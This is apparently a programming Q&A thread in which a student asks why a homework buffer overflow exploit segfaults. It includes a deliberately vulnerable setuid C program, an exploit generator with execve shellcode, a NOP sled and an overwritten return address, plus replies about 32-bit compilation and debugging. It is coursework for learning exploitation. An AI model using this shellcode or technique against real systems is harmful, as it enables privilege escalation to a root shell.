# Buffer Overflow Attack Segmentation fault (core dumped)

Tags: c, security, assembly

I'm trying to complete my homework assignment on a buffer overflow attack to get into the root shell, but everytime I run my stack.c its giving me a segmentation fault. I was wondering if someone could point me in the right direction. I've

```
/* stack.c */
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int bof(char *str)
{
    char buffer[12];

    /* The following statement has a buffer overflow problem */
    strcpy(buffer, str);
    return 1;
}
int main(int argc, char **argv)
{
    char str[517];
    FILE *badfile;
    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 517, badfile);
    bof(str);
    printf("Returned Properly\n");
    return 1;
}
```

This is the one that I've edit.

```
/* exploit.c*/
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x31\xc0"      /* xorl     %eax,%eax   */
"\x50"          /* pushl    %eax        */
"\x68""//sh"    /* pushl    $0x68732f2f */
"\x68""/bin"    /* pushl    $0x6e69622f */
"\x89\xe3"      /* movl     %esp,%ebx   */
"\x50"          /* pushl    %eax        */
"\x53"          /* pushl    %ebx        */
"\x89\xe1"      /* movl     %esp,%ecx   */
"\x99"          /* cdql                 */
"\xb0\x0b"      /* movb     $0x0b,%al   */
"\xcd\x80"      /* int      $0x80       */
;

void main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(&buffer, 0x90, 517);

    /* You need to fill the buffer with appropriate contents here */
    long buffer_start = 0xbffff174;
    long landing = buffer_start + 250;
    long* ptr = (long*)(buffer + 24);
    *ptr = landing;
    memcpy(buffer + sizeof(buffer) - sizeof(shellcode), shellcode, sizeof(shellcode));

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
}
```

Comment: You forgot to show how you compile the code and what system are you on. Chances are, stack is not executable, so even if your code gets to be at the right address it will fault. PS: learn to use a debugger so you can at least see where it faults.

Comment: Sorry about that, for stack I compile like this is root 

   `gcc -o stack -fno-stack-protector -z execstack stack.c`
  then `chmod 4755 stack`

and for exploit:
`gcc -o exploit exploit.c`

Comment: Are you sure you compile `stack.c` in a 32-bit mode (or on a 32-bit system)? Your shellcode is assuming 32-bit code.

Comment: If you had a 64-bit environment installed you should be able to compile and run 32-bit code. Installing gcc-multilib and g++-multilib may be all that is needed. If using Ubuntu you'd do that with something like `sudo apt-get install gcc-multilib g++-multilib` . Then add `-m32` to your _GCC_ command. The reverse isn't true - if on a 32-bit system you can't natively run 64-bit code

Answer (score 2):

Your question is quite puzzling.

Not only it is not clear how you really compile this stuff, neither is how it is being run.

The shellcode in question assumes a 32-bit linux binary. Further, the stack location of a 32-bit binary running on a 64-bit linux differs from what you can expect from running said binary on a 32-bit system. Which in turn means the return address which is put in place of the old one must be computed with taking that into consideration. Chances are your school even told you to run a 32-bit vm or something.

Regardless, your first steps should be to inspect the crash, which you can do with gdb (or other debugger, whatever is used in the class), about which you should have been told.

And here is the classic on the subject, written in 32-bit times: http://phrack.org/issues/49/14.html "Smashing The Stack For Fun And Profit"

Comment: Thank you for your answer, I was running on 64bit, There were no instructions telling me to use the 32 bit, I just assumed it was 64 since it defaulted in virtual box. I'm installing the 32 bit environment right now and see if it solved the problem.